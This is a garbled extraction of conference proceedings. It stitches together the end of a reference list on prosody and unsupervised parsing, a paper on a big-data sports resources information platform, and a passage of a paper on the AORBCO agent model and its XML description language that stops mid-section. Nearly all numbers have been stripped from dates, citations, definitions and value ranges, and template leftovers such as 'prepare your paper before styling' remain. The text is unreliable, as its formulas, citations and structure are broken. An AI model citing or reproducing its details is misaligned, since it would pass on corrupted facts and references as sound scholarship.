structural packaging in the input to language learning: contributions of prosodic and morphological marking of phrases to the acquisition of language. cognitive psychology, : – . tahira naseem and regina barzilay. . using semantic cues to learn syntax. in proceedings of aaai. john k pate and sharon goldwater. . unsupervised syntactic chunking with acoustic cues: computational models for prosodic bootstrapping. in proceedings of the nd acl workshop on cognitive modeling and computational linguistics. elias ponvert, jason baldridge, and katrin erk. . simple unsupervised grammar induction from raw text with cascaded finite state models. in proceedings of acl-hlt. patti j price, mari ostendorf, stefanie shattuck-hufnagel, and cynthia fong. . the use of prosody in syntactic disambiguation. in proceedings of the hlt workshop on speech and natural language, pages – , morristown, nj, usa. association for computational linguistics. c anton rytting, chris brew, and eric fosler-lussier. . segmenting words from natural speech: subsegmental variation in segmental cues. journal of child language, ( ): – . roy schwartz, omri abend, roi reichart, and ari rappoport. . neutralizing linguistically problematic annotations in unsupervised dependency parsing evaluation. in proceedings of the th acl, pages – . yoav seginer. . fast unsupervised incremental parsing. in proceedings of acl. amanda seidl. . infants' use and weighting of prosodic cues in clause segmentation. journal of memory and language, ( ): – . valentin i spitkovsky, hiyan alshawi, angel x chang, and daniel jurafsky. a. unsupervised dependency parsing without gold part-of-speech tags. in proceedings of emnlp. valentin i spitkovsky, hiyan alshawi, and daniel jurafsky. b. punctuation: making a point in unsupervised dependency parsing. in proceedings of conll. harry tily, susanne gahl, inbal arnon, neal snider, anubha kothari, and joan bresnan. . syntactic probabilities affect pronunciation variation in spontaneous speech. language and cognition, ( ): – .
international conference on sensor network and computer engineering (icsnce )
research on the construction of sports resources information platform based on big data
wang shuangming , . malaysia university of science and technology kuala lumpur, malaysia .
dean's office, xi'an siyuan university xi'an, china e-mail: @qq.com shi jianwei personnel office, xi'an siyuan university xi'an, china e-mail: @ qq.com fu shiqiu college of liberal arts xi'an siyuan university xi'an, china e-mail: @ qq.com xu wanlin sports departmen xi'an siyuan university xi'an, china e-mail: @ qq.com abstract—the rapid development of communication technology such as big data makes the integration and application of sports resource information become the key of sports informatization construction. the construction of sports resources information big data platform is of great significance to the integration of sports resources and the sharing of sports resources. the subject explores the related theory of sports resources, studies the present situation of the application of sports resources, constructs the overall construction framework of sports resources information big data platform, analyzes and designs the functions of each subsystem, and discusses the performance evaluation of sports resources information big data platform. keywords-big data; sports resources information; platform construction i. introduction a. the advent of big data era the state council's "outline for accelerating the development of big data" (guofa [ ] no. ) states: the convergence of information technology and economic society has led to the rapid growth of data. the data have become a national basic strategic resource. big data is increasingly being used globally, with an important impact on global production, circulation, distribution, consumption activities as well as economic operation mechanism, social life style and national governance ability.[ ] at present, china ranks first in the world in the scale of internet and mobile internet users with abundant data resource and application market advantages. breakthroughs have been made in key data technology research and development in some big data sectors. a number of internet innovative enterprises and innovative applications have emerged. some local governments have started big-data-related work. insisting on innovation-driven development, accelerating the deployment of big data and deepening the application of big data have become the inherent and necessary choices of stabilizing growth, promoting reforms, adjusting structure, benefiting people's livelihood, and promoting the modernization of government governance.[ ]big data technology opens up a whole new era of opportunities and challenges. big data is a data set featuring large capacity, multiple types, high speed access and high application value. it is rapidly evolving into collecting, storing and associating and analyzing a large amount of data with diverse sources and diverse formats, which will discover new knowledge, create new values and upgrade new capabilities in a new generation of information technology and service forms. [ ] big data is featured by massive scale, high-speed circulation and rich forms, which has been widely used and developed in it, aviation, e-commerce and other industries. big data complements and improves traditional data collection methods, which expands the breadth and depth of data usage. b. 
the development of sports informatization the emergence of "internet+" has promoted the innovation and development of information technology in the industry.[ ] "national fitness program ( - )" pointed out that we must promote depth integration between "internet+", big data and other information technology and the national fitness program, so as to facilitate the construction of national fitness public service information platform.[ ] the " th five-year plan for sports development" issued by general administration of sport of china affirmed that "internet+" has infused new vitality into sports development and should make full use of new technologies to develop various types of app to open up the customer market.[ ] under the guidance of the programmatic documents, sports informatization has made some progress. international conference on sensor network and computer engineering (icsnce ) c. sports resources integration needs "the contradiction between the growing mass sports demand and the relative insufficiency of social sports resources "[ ] has become increasingly acute. relevant statistics show that the number of people who regularly participate in physical exercise in china has increased by . % in the recent seven years, while that of sports supported by public finance has dropped by . %. on the one hand, there are largely idle sports facilities which are heavily subsidized by the government for large- scale sporting events. most sports venues built by individuals or social groups are poorly equipped with few visitors, and the utilization rate of sports facilities in schools and enterprises is low; on the other hand, residents can not find a place suitable for exercise. the reasons are as follows: first, the distribution of public sports resources is not balanced; second, the dislocation of supply and demand of sports resources "aristocratic supply" and "civilian needs"; third, the information asymmetry of supply and demand of sports resources. taking "internet+" as an opportunity, we shall use big data technology to build a sports resource information platform to precisely match users and sports resources and improve the utilization rate of sports resources and satisfaction of all parties. ii. overview of sports resources big data a. sports informatization the ultimate goal of sports development is to better provide the public with satisfying sports products and services. the matching degree between sports informationization and public demand can most directly reflect the construction results of sports. judging from the current situation of the development of sports informationization, there is still a big gap between sports information service and public demand, which is mainly manifested in the following three aspects: ) less capable of collaborative development:sports information management agencies are always at a low level, we do not attach importance to the training and stability of the sports information personnel, with the lack of necessary follow-up financial security. sports information construction is not highly motivated by the management level, operational level and the implementation level or with inconsistent understanding, and there is no system or mechanism to organize and coordinate the relationship among the government, sports departments and the masses, leading to the lack of sustainable development of sports information construction. 
) the level of information technology application is generally low:due to the fragmentation of the application of sports information technology, the poor circulation of information resources and the low involvement of new technologies, the scientification degree of sports management, planning, development and decision-making is low. the success stories of sports information systems are few, also with the lack of key projects promoted by works in all areas. ) inefficient access to service information:the growth of service resources failed to meet the growing public demand and public satisfaction was poor. on the one hand, the release of service information is often limited to the news media, policy documents, government websites, etc. the coverage and transmission speed of information are affected to some extent, and the public can not obtain real-time, comprehensive and accurate service information through mobile terminals. on the other hand, there are too few valuable service functions available online, resulting in low public participation. as for the specific sports resources big data, it also faces many challenges. the problems that need to be solved are as follows: the old and new software and hardware systems are difficult to integrate in depth, and the applications and data based on the system are featured by low relevance and poor sharing; unscientific data classification and low data utilization; large differences among data formats and serious data redundancy. sports resource information big data content is huge, which involves a large number of departments, so we shall properly solve the above problems and make the sports resources information database to better serve the public. b. concept of sports resource information platform based on big data the information technology is used to mine the information contained in the big data of sports resources and store the information according to certain rules, so that a massive sports information database is constructed, and a multi-user information platform is constructed based on the sports resources information database. such a platform is called sports resources information big data platform. iii. analysis and design of sports resource information platform based on big data a. construction principles of sports resource information platform based on big data the construction principles of sports resource information platform based on big data include: ) unity:the development of a unified technical specifications. the construction of the sports resources information platform based on big data must adopt a unified technology architecture, so as to ensure the smooth implementation of the system and good application results. ) security: the platform security is the lifeblood of the platform, so we should attach great importance to platform application security, data security and overall security in the platform implementation process. upholding the principle of reliability, we shall to the maximum extent possible avoid business failures due to technical failure. international conference on sensor network and computer engineering (icsnce ) ) reliability: the platform should use mature technologies and interfaces to make full use of the existing sports resource applications to avoid the construction risk and the use risk of the platform due to technical defects. 
) scalability: the sports resource information platform based on big data should be designed and developed based on the needs of the sports management department, sports resource providers and sports resource users, and should give full consideration to the adaptability of the platform to the business changes of all stakeholders. the platform design and development may reduce the impact of business changes on the platform and achieve stable support for business changes through proper expansion and simple modification of the platform. ) forward-looking: the platform construction should be forward-looking, and we must consider the needs of business updates in the next few years, learn from the advanced international and domestic experience, and adopt the successful technology of information platform construction so that the platform can reflect the advanced nature in the future. b. business framework of sports resource information platform based on big data with the deepening of the concept of "internet+", sports informationization has also been developed. sports administrations and sports industry management co., ltd. have basically constructed portals and app applications. we should build platforms on this basis and make overall planning in advance to further clarify the platform business framework. the business on sports resources information big data platform in accordance with the occurrence of the object can be divided into: management department-to-management department, management department-to-business and business-to-business users. there are many sources of information on sports resources, which can be divided into internal systems of management departments and external systems of management departments. the internal systems of management departments include: track and field training center, stadium management committee, sports industry group co., ltd., stadiums, sports service guarantee center, etc.; external systems include: sports facilities of enterprises and institutions, fitness centers organized by social forces. we shall build a sports resources information big data platform and tap existing sports resources data to provide support and services for various applications that require sports resource data. c. construction of sports resources information big data platform based on the sports resource information of relevant agencies such as the sports management department, enterprises and institutions and the fitness center held by the social forces, the big data platform of sports resources information, through the mining of data, provides support for the sports resources information applied in the management department, the relevant units and individuals based on sports resources information sharing mechanism. ) framework of sports resources information big data platform the data platform shall comply with the construction standards and the basic requirements for protection of security level of information systems (people's republic of china national standard gb/t - ) and shall be constructed by the infrastructure, big data system and big data application system. standard system: a scientific and feasible standard system is a key factor for the successful construction of a big data platform for sports resources information. we shall establish the "sports resources information big data platform expert committee", and the expert committee shall develop data platform technical standards, management standards and safety regulations. 
security: security system is the lifeline of the big data platform of sports resources information. we shall make full use of the technical features of big data platform to prevent illegal invasion and vulnerability attacks and strengthen the establishment of security clearance system with virus clearing and access setting as the core so as to ensure the data security and system security of the sports resources information big data platform. infrastructure: the construction of a big data platform for sports resources information requires the existing sports resources information of sports management departments, sports institutions and enterprises and fitness centers organized by social forces, and needs to collect real-time data from these departments. the stable, reliable and secure network channel, powerful hardware and software systems are the necessary conditions for the completion of data collection and integration. we should further increase the intensity of infrastructure construction, optimize the network system, upgrade and update the computer hardware and software equipment, and lay a solid material foundation for the big data platform. big data system: sports resource information big data system includes support data, data exchange and integration system, catalog management system, operation and maintenance system. the data exchange and integration system will be distributed in different business systems, diversified data collection, cleaning, exchange and integration and other operations. the processed data is then stored by the catalog management system. big data application: big data application system is the core of big data platform of sports resource information and also the key to realize various applications. the platform can provide various types of big data services to sports management departments, enterprises and public institutions, fitness centers and individuals. for example, the sports administration department monitors the sports stadiums in real time; the user reserves the venue through the terminal according to the stadium distribution and the number of real- time users; and the user reserves the courses online according to the contents and time of the coach. international conference on sensor network and computer engineering (icsnce ) d. design of sports resources information big data platform the sports resources information big data platform includes: support data, data exchange and integration system, catalog management system, operation and maintenance management system, interface system and platform system. the structure of sports resources information big data platform is shown as in figure . figure . structure of sports resources information big data platform ) support data the support data can effectively connect sports resources information big data platform and sports resources database, and also can support the normal operation of other systems. it mainly contains metadata, exchange data, directory data, management data and security data. the metadata, also known as the intermediary data, is the information about the organization of the data, the data fields and their relation. 
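as a purely illustrative sketch of the venue-reservation application mentioned above, the fragment below shows how real-time occupancy data reported to the platform could drive a booking decision; all class, field, and venue names here are hypothetical and are not part of the platform design described in this paper:

    from dataclasses import dataclass

    @dataclass
    class Venue:
        # hypothetical record assembled from the platform's real-time feeds
        name: str
        capacity: int
        current_users: int

    def reservable_venues(venues, party_size):
        # keep venues that can still accommodate the requesting party
        return [v for v in venues if v.current_users + party_size <= v.capacity]

    # a user terminal queries the platform and offers the first available venue
    venues = [Venue("campus gym", 80, 75), Venue("court no. 2", 20, 8)]
    options = reservable_venues(venues, party_size=4)
    if options:
        print("reservation available at:", options[0].name)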
in short, the metadata is the data about the data; the exchange data is generated during the data exchange, which includes node data, parameter management information, etc .; the directory data is mainly the directory information of sports information resource; the operation and other information generated by the operation and maintenance system collectively referred to as management data; the system failure frequency information and system security analysis data that record security situation of sports resources information big data platform becomes safety data. ) data exchange and integration system the data exchange is based on a unified network and exchange protocol to achieve the exchange of information on sports resources between the relevant departments, avoid data chaos and repeat in the process of running exchange so as to achieve the synchronization of sports resources information and ensure data stability and security. the data exchange business model is shown in figure . figure . data exchange business model the main function of data integration is collecting, cleaning, exchanging and integrating the sports resource information data dispersed in various departments, re- analyzing the data collection for relevance and causality and digging data deeply to form new and more valuable data resources. data integration service system includes modules of integrated configuration, component management, process management and integration results information query. the integrated configuration module is used for dynamically configuring and integrating rules. the component management module is used to package data cleaning, conversion, alignment and splitting. the process management module is used for process management of various processes in the integration and implementation process; the integrated result information query module is used to provide query and statistics of the data integration results. the data integration business model is shown in figure . figure . data exchange business model ) catalog management system the catalog management system achieves its functionality through three subsystems like cataloging, transmission, management and service. catalog system finishes metadata assignment and generates the contents of the directory in accordance with predetermined standards; international conference on sensor network and computer engineering (icsnce ) directory transmission system completes the transmission of the directory contents between databases; directory management and service system realizes directory content audit, query, publishing and other functions. ) operation and maintenance management system the o&m management system realizes the daily operation and maintenance and the security of big data platform of sports resource information. the main functions are as follows: user management: this function is mainly used to distinguish between the providers, managers and users of sports resource information, and users with different identities have different permissions; resource management: this function is mainly used for the management of metadata, with the query function; application management: this function is mainly used for reviewing and sorting out the distributed sports resource information, and charging the released information of paid sports resources; security maintenance and management: realizing such functions as user identity authentication, data encryption and transmission, real-time data backup, and recording daily access status and fault information. 
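the user management function described above distinguishes providers, managers and ordinary users of sports resource information, and gives each identity different permissions. a minimal sketch of such a role check is given below; the role names and the operations assigned to them are assumptions made only for illustration and are not taken from the platform itself.

# hypothetical role-to-permission mapping for the o&m user management function
ROLE_PERMISSIONS = {
    "provider": {"publish_resource", "update_resource", "query_metadata"},
    "manager": {"review_application", "charge_paid_resource", "query_metadata", "backup_data"},
    "user": {"query_metadata", "reserve_venue"},
}

def is_allowed(role, operation):
    """return true if the given identity is permitted to perform the operation."""
    return operation in ROLE_PERMISSIONS.get(role, set())

print(is_allowed("user", "reserve_venue"))         # True
print(is_allowed("user", "charge_paid_resource"))  # False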
) interface system the interface system is a channel for developers to call sports resource information. with this channel, developers can integrate the service of the platform with their own existing applications and directly develop the big data platform of sports resource information. ) platform system the running window of sports resources information big data platform is the platform system. the platform system is user-oriented, providing support services according to different needs, which is used for a variety of platform-based applications in order to achieve the construction of sports resources information big data platform. iv. performance evaluation of sports resources information big data platform the objective evaluation of sports resources information big data platform is to master the use of sports resources information, improve the utilization of sports resources, further promote the development of sports informatization and improve the physical fitness of the people. the selection of performance evaluation indicators should be clear and easy to operate, combining qualitative indicators with quantitative indicators, establishing a performance evaluation index system that objectively reflects the big data platform of sports resources information, and scientifically evaluating the big data platform of sports resources information. v. conclusion the big data platform for sports resource information covers such big data as investment in sports resources, costs, prices and benefits, involving sports management departments, enterprises and institutions, and fitness centers organized by social forces. through the data cleaning, mining and other operations to sports resource information and based on the sports resource information sharing mechanism, the platform can provide the support of sports resource information applications. problems such as unbalanced distribution of public sports resources, dislocation of supply and demand of sports resources and informatoin asymmetry of supply and demand of sports resources must be solved technically and the pace of sports information construction in china shall be accelerated to further enhance the national physique. acknowledgment subject: routine subject of sports bureau of shaanxi province in : big-data-based research on integration and application of sports resource in shaanxi province (project no. ); annual university-level research project of xi'an siyuan university in : planning and research on campus card system(project no.xasy-b ). references [ ] [ ] china state council, action program for big data development, [eb/ol] .http: //www.gov.cn/zhengce/content/ - / /content_ .htm, august , . (references) [ ] qu haixu, zhang hujun and cui haiqing, development and application of production and operation simulation system of oil company based on big data [j]. [ ] zhang jingbo, research on the improvement of computer network reliability under the background of "internet+" [j] .journal of liaoning higher vocational technical institute, vol. ( ), pp. - , . [ ] general administration of sport of china, national fitness program ( - ) [eb/ol] .http: //www.sport.gov.cn/n /n /c /content.html, august , . [ ] general administration of sport of china, " th five-year plan" for sports development, [eb/ol] .http: //news.xinhuanet.com/sports/ - / /c_ .htm, august , . [ ] liu liang and wang hui, dispelling and reforming ways of supply and demand contradictions of public sports resources in china from the perspective of supply-side reform [j]. 
journal of wuhan institute of physical education, vol. ( ), pp. - , . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) research on aorbco model and it's description language zhi min school of computer science and engineering xi’an technological university xi’an, china e-mail: jaja @qq.com luo junmin school of computer science and engineering xi’an technological university xi’an, china e-mail: robertjm@ .com gao wuqi school of computer science and engineering xi’an technological university xi’an, china e-mail: gaowuqi@ .com abstract—this paper improves the aorbco model based on the four characteristics of intelligence- self conscious, mutual representation, fuzziness and dynamics, and designs a description language of aorbco model. the language describes the self-consciousness of an agent with its’ five components-belief, desire, ability, planning and behavior control mechanism. the components of entities including acquaintances of an agent and objects known by the agent are as the starting point to characterize the mutual representation of intelligence. introducing and updating of the weights to express the closely degree of relationship among entities are to simulate the fuzzy of intelligence. the behavior control mechanism of the agent makes the intelligent dynamics realization. the aorbco description language based on xml makes the expression form and content of the resources unify through the definition of correlative marks, which is convenient for people and computers to understand the semantics of language components. the essence of space and time is also revealed in this paper. keywords-aorbco; intelligent mode; agent; self- consciousness; description language i. the introduction the aorbco model was proposed in the literature[ ]. its purpose is to unify the concepts of ontology in philosophy and computer science so that the expression form and content of the resources are combined organically. in the literature[ ], the author try to unified the intelligent models of the three schools of artificial intelligence as an integrated intelligent model. however, through the study of literature[ , and ], it is known that intelligence not only has the characteristics of mutual representation, fuzziness and dynamism but also more self-awareness. the concept of ontology in philosophy refers to the origin of things, the origin is invisible and incomprehensible, and everything is just the manifestation of ontology[ ] . people in computer science field uses the concept of ontology to formally define the terms used in a certain field and their relationship[ ]. it is actually just a formal definition of domain knowledge only. therefore, we think it is better not to use the concept of domain knowledge in the field of computer science, but rather to ensure the sacredness of the concept of ontology in philosophy and better understand the connotation and relationship of related concepts in computer science. based on the above research, especially with the improvement of the original aorbco model based on the intelligent self-awareness, this paper proposes aorbco intelligent model with agent as the core, simulates human's thoughts and behaviors , and makes the agent imitate human's behavior model to deal with the information in order to achieve the automatic update and evolution of knowledge to make the agent more intelligent. 
at the same time, the aorbco description language is designed for the model, and its description form and language structure are more in line with the new aorbco intelligent model[ , ] expression needs.. ii. a formal description of aorbco in our real life, human beings seem to live in the same world, but if you analysis carefully you can find that each person is an independent individual and has a different worldview. each people are individuals observe from your own perspective. for each individual, the world exists in his own understanding, and it is impossible for an individual to jump out of his field of vision to see other people's "world". this is what people often say the "one person, one world". individuals in the observing the surrounding environment and communicating with other individuals at the same time, in this process we will modify our own understanding of the concepts and its relationship, and then through self- understanding to form new ideas or new abilities; in many individual exchanges and communication we will build a common view of things and awareness, that is, domain knowledge - knowledge system based on consensus[ ]. we want to simulate this process of knowledge formation and updating in the computer world, simulating human intelligence through an agent in the aorbco intelligent model, which consists of five components of belief, desire, ability, planning, and behavior control mechanisms, defined as follows: mailto:robertjm@ .com mailto:gaowuqi@ .com international conference on sensor network and computer engineering (icsnce ) definition : subject, agent assume: a(t) denote the agent's cognition of its own state at time t, aa represents the set of acquaintances recognized by the agent; oa represents the set of objects known by the agent; ra represents the set of relations recognized by the agent; h (t) represents the set of work completed by the agent before time t,namely the historical operation set of agent; d (t) represents the agent's desire at time t; p (t) represents the set of work to be done at time t, namely, the plan of agent to realize the current wish; behavior_controller represents the agent's behavior control mechanism; a(t)=(aa, oa, ra, h(t), d(t), p(t), behavior_controller) t is what we usually say time, its essence is the order of the agent in different states (that is, what we call the space) . definition : acquaintance subject, acq-agent assume: aa (i, t) denote the agent's cognition of acquaintance subject's state at time t, aa(i, t)  aa. “i” represents the name or number of the subject of an acquaintance, especially the subject of an acquaintance. aaa represents a acquaintance subject's(acq-agent.i) acquaintance set; oaa represents a set of objects known by acq-agent. i; raa represents a set of relations perceived by acq-agent.i; h(i, t) represents a set of work to be done before time t,namely the historical operation set of acq-agent. i; d(i, t) denotes the desire of acq-agent. i at time t; p(i, t) denotes the set of actions to be performed by acq-agent. i at time t, namely, the plan of acq-agent. i to realize the current wish; then: aa(i, t)=(aaa, oaa, raa, h(i, t), d(i, t), p(i, t)) he description of aaa, oaa, raa, h(i, t), d(i, t), p(i, t) correspond to aa, oa, ra, h(t), d(t) and p(t) in agent respectively, their formal definition is similar too. definition : object, object assume: o (i, t) represents the state of the object (object.i) which the agent knows at time t, o (i, t) oa. oo represents the set of objects related to object. 
i in the agent's cognition, oo⊆oa; ao represents the set of agents which are related to object. i, ao⊆ aa; ro represents the set of relations related to object. i , ro⊆ra. o(i, t)=(ao, oo, ro) definition : relationship, ra assume: r (ei, ej, t) represents the cognition of the subject at time t,r(ei, ej, t)∈ra;ei, ej denotes agent or object, and id is the relationship name; ra represent the degree of closeness, the value range [ , ]; ri represent instantaneous relationship, the value is or ; ra = Σri / t. then: ra(ei, ej, t)=(id, ri, ra),if ri is , ei, ej has no relationship named id at time t; if ra(ei, ej, t) is empty, ei and ej have no relationship. definition : history, h(t) assume:work means the operation or sequence of operations that subject has performed. then: a(t ) work a(t )∈h(t),t <t <t a (t ) work a (t ) represent the agent is from the state a (t ) to state a (t ) by executing the action. definition : desire, d(t) assume: work represent a operation or a operation sequence that subject planed to achieve the desired.then: a(t ) work a(t )∈d(t) ,t<t <t 或 t <t<t definition : plan, p(t) assume: work indicates the sequence of actions or operations to be performed by subject. then: a(t) work a(t )∈p(t),t<t definition : behavior control mechanism, bc u-agent indicates the user body or user, then bc could be described like this: t=t ; initialize a(t ); while(d(t)≠null) { if (a(t)could generate w(t)) { generate p(t) and execute it; t=t+δt; } else consult u-agent; } iii. definition of aorbco description language in order to make the aorbco model practical, the bnf definition of its description language is given. in this description language ,type is used to represent types, which are basic data types and user-defined classes; val represents an object itself; weight represents a number between ( , ); suffixes with _name are identifier; and define these keywords: agent, belief, act, desire, plan, behavior_controller, acq_agent, acq_object, acq_class, acq_bbelief, acq_aact, acq_ddesire, acq_pplan, address, acq_aagent, acq_oobject, acq_cclass, member ship formula, precondition, post condition, parameter (the keyword in the definition is in bold.), arguments, its semantics will be introduced in the fourth part. table i. 
the symbols used in bnf definitions are as follows symbols definitions :: = "defined as" meaning [ ] there are optional {} there is a collection | the content on the left and right sides is optional terminator in bold non-terminal in normal fonts  subject::=<agent agent_name> beliefset abilityset desireset planset behaviorcontrol </agent agent_name> international conference on sensor network and computer engineering (icsnce )  beliefset::=<belief [/] >[acquaintancesubjectset  cognitiveobjectset cognitiveclassset</belief>]  abilityset::=<act [/] > [{ability}</act>]  desireset::=<desire [/] >[{desire} </desire>]  planset::=<plan [/] > [{plan} </plan> ]  behaviorcontrol::=<behavior_controller>controlfu nction</behavior_controller>  acquaintancesubjectset::=<acq_agent [/]>[{acquaintancesubject}</acq_agent>]  acquaintancesubject::=<agent_name>  weight acquaintancebeliefset acquaintanceabilityset acquaintancedesireset acquaintanceplanset communicationinterface</agent_name>  cognitiveobjectset ::=<acq_object [/]>[{object}</acq_object>]  object::=<object_name> {objectattributes}</object_name>  cognitiveclassset::=<acq_class [/]>[{class}</acq_class>]  class::=<class_name>weight {classattributes} membershipcalculationformula</class_name>  ability::=<action_name [/] >[precondition postcondition parameterlist  actionbody</action_name >]  desire::= <desire_name [/]>  [logicexpression</desire_name >]  plan::=<desire_name [/]>  [{<action_name>argumentlist</action_name>} </desire_name>]  acquaintancebeliefset::=<acq_bbelief[/] >[subject setofacquaintance  objectsetofacquaintance  classsetofacquaintance  </acq_bbelief>]  acquaintanceabilityset::= <acq_aact [/] >[{acquaintanceability}</acq_aact>]  acquaintancedesireset::=<acq_ddesire [/] > [{desire} </acq_ddesire>]  acquaintanceplanset::=<acq_pplan [/] > [{plan}</acq_pplan>]  communicationinterface::=<address uri/>  subjectsetofacquaintance:=<acq_aagent [/]>[{<agent_name/>}</acq_aagent>]  objectsetofacquaintance::=<acq_oobject [/]>[<object_name/>}</acq_oobject>]  classsetofacquaintance::=<acq_cclass [/]>[{<class_name/>}</acq_cclass>]  acquaintanceability::=<action_name [/] >[precondition postcondition parameterlist</action_name>]  objectattributes::=< attr_name >type:val;weight</attr_name>  classattributes::=<attr_name> type: weight </attr_name>  membershipcalculationformula::=  <membershipformula>  functionexpression  </membershipformula>  precondition::=<precondition> logicexpression </precondition>  postcondition::=<postcondition> logicexpression </postcondition>  parameterlist::=<parameter [/] > [{parameter_name : type;} </parameter>]  argumentlist::=<arguments [/] > [{arguement_name : val;} </arguments>]  actbody::=<body>function</body> iv. prepare your paper before styling the aorbco description language describes the aorbco intelligence model in a way that unified expression of content and form ( semantics and grammar), which intent to define the language components that both humans and computers can understand. mutual representation is one of the characteristics of intelligent systems, that is, any thing describes itself through the relationship with other things. the aorbco description language uses the syntax of xml with the form:<tag>...< / tag> , that is ,the label's semantics are defined by its component "...", and its components may have other labels in turn, so that the system has an intelligent mutual representation, it shows the complex relationship between the concept. 
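as a concrete illustration of the grammar and of the <tag>...</tag> form discussed above, a small hand-written agent description is parsed below with python's xml.etree.elementtree. the agent name, the single desire and the empty component sets are invented for the example; the paper writes the opening tag as <agent agent_name>, which is not well-formed xml, so this sketch folds the name into the tag itself.

import xml.etree.ElementTree as ET

# a minimal description following the bnf: belief, act, desire, plan, behavior_controller
agent_xml = """
<agent_robot>
  <belief>
    <acq_agent/>
    <acq_object/>
    <acq_class/>
  </belief>
  <act/>
  <desire>
    <deliver_parcel/>
  </desire>
  <plan/>
  <behavior_controller>control_function</behavior_controller>
</agent_robot>
"""

root = ET.fromstring(agent_xml)
print(root.tag)                                         # agent_robot
print([child.tag for child in root])                    # the five components of the agent
print(root.find("desire/deliver_parcel") is not None)   # True: the example desire is present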
fuzziness is another characteristic of the intelligent system, that is, the degree of the closeness of the relations among things is different. the aorbco description language is explicitly represented by the weight. in addition, the description of the acquaintance of the subject and the acquaintance of the acquaintance in the model is difference in detail. it is also an implicit expression of fuzziness. evolution refers to subject in the system adjust constantly the relationship between subject and object. the mutual representation of things is the premise of fuzziness, and the fuzziness changes with the operation of the system, so that the whole model is in an evolving dynamic. a. description of the agent aorbco model is based on the idea of "one person, one world" to build a self-aware intelligent model centered on the agent. through the analysis of the composition of human self-awareness [ ] , we divide the agent into five parts: belief, act, desire, plan, behavior_controller. belief is the agent's description of the entity it knows and entities' relationship. we hope to express the "worldview" that the agent possesses through belief, that is to say, agent's view of the world. ability means the function that an agent can do. desire is the target state they hope to achieve. planning is an ordered set of capabilities that are chosen to fulfill their desire. behavior control mechanisms enable the above components to form an organic whole. the description of the agent is as follows: <agent name> <belief/> <act/> <desire/> international conference on sensor network and computer engineering (icsnce ) <plan/> < behavior_controller /> </agent name> b. description of the belief belief is description of the entity agent knows and its relationship. entities are divided into two categories: one is subject, an active acquaintance principal; another is a passive object. there are two kinds of relationship between entities. the description of the belief is shown below: <belief> <acq_agent/> <acq_object/> <acq_class/> </belief> ) description of the acquaintance subject <acq_agent /> represents an acquaintance subject set, which is the mapping of other subjects that are related to the agent.acquaintance subject have their own beliefs <acq_bbelief/>, abilities <acq_aact />, wishes <acq_ddesire/>, planning <acq_pplan/>, which are not described in detail,expect the mechanism of behavior control. in addition, the acquaintance also added the communication interface <address />, using uri as the only one address identifier. each agent have a special subject of acquaintance, that is, himself. in the acquaintance's belief, using <acq_aagent/>, <acq_oobject/> and <acq_cclass/> describe the acquaintance subject's acquaintance, objects and classes. the specific form is as follows: <acq_agent> <agent_name> weight <acq_bbelief> <acq_aagent/> <acq_oobject/> <acq_cclass/> </acq_bbelief> <acq_aact/> <acq_ddesire/> <acq_pplan /> <address uri/> </agent_name> …… <acq_agent> weight refers to the degree of intimacy between acquaintance subject and agent. ) description of the object <acq_object/> represents the set of objects that the agent knows, and <object_name/> represents an object in the set of objects and consists of the attributes of the object. object attributes are other objects related to this object; object attributes is composed of the object attribute name <attr_name/>, the attribute type, the attribute value and weight. 
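the weight that expresses how close an acquaintance subject is to the agent can be read back from such a belief description. the fragment below repeats the structure just given with an invented acquaintance, weight and address; the paper places the weight as bare content inside the acquaintance tag, so this sketch wraps it in its own element to make it machine-readable.

import xml.etree.ElementTree as ET

belief_xml = """
<belief>
  <acq_agent>
    <agent_alice>
      <weight>0.8</weight>
      <acq_bbelief/>
      <acq_aact/>
      <acq_ddesire/>
      <acq_pplan/>
      <address uri="tcp://192.0.2.10:9000"/>
    </agent_alice>
  </acq_agent>
  <acq_object/>
  <acq_class/>
</belief>
"""

belief = ET.fromstring(belief_xml)
for acquaintance in belief.find("acq_agent"):
    weight = float(acquaintance.findtext("weight"))   # closeness degree between agent and acquaintance
    uri = acquaintance.find("address").get("uri")     # communication interface of the acquaintance
    print(acquaintance.tag, weight, uri)              # agent_alice 0.8 tcp://192.0.2.10:9000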
in fact, the external form of the subject exists in the form of the object, which is called the subjectivity of the subject. to represent the subjectivity of the subject, a special kind of object is designed to describe the characteristics of the corresponding subject, which represent the subjective perception of the object or an acquaintance. the specific description of the object is as follows: <acq_object> <object_name> <attr_name>type:val;weight</attr_name> ...... </object_name> ...... </acq_object> ) description of the class in this paper, the model is divided into specific and abstract relationship, the specific relationship is reflected in the description of each element. described in <acq_class/> is the abstract relationship, which is the subject of object classification, including two: one is the agent's classification of the object it currently knows; the other is the agent's classification of acquaintances it knows. the classification of the acquaintance subject is based on the subject's objectivity mentioned above, so we use the same description of the object class here. each class include parts: class name <class_name/>, class attribute list, class membership calculation formula <membershipformula/>, and membership threshold weight. the class attribute indicates characteristics which the object belong to this class should have, including attribute name <attr_name />, data type and weight (weights and thresholds are expressed in weight)which means how important this attribute is in the class. the class membership degree calculation formula is based on the class attribute features to calculate the degree of object belonging to the class, the value range ( , ), membership threshold is used to specify the minimum membership value belongs to the class. the specific description is as follows: <acq_class> <class_name> <attr_name> type:weight </attr_name> …… <membershipformula/> weight </class_name> …… </acq_class> c. description of the ability <act /> here represents the set of capabilities of the agent, including several specific capabilities. each act consists of capability name </action_name>, precondition </ precondition >, post-condition </postcondition>, formal parameter list <parameter /> and action body <body />. the precondition indicates the condition that the parameters related to the action should satisfy before the action is executed. the post-condition indicates the condition that the parameter related to the action should satisfy after the action is executed. the action body is a specific execution process. the specific description of the ability is as follows: <act> <action_name> <precondition/> <postcondition/> international conference on sensor network and computer engineering (icsnce ) <parameter/> <body/> </action_name> …… </act > d. description of the desire <desire /> indicates that the target state set of the agent contains a number of specific wishes, which is the main motivation of the agent's behavior. <desire_name/> represents one of the wishes that represent the state the agent wants to reach or maintain. these aspirations may be user agent commands or requests from other agents, or the distance between changes in the environment and hold. the realization of the wish is to make the corresponding plan through the planning function in the behavior control mechanism. during the execution of these plans, there may be changes in belief or ability to achieve the desired goal. 
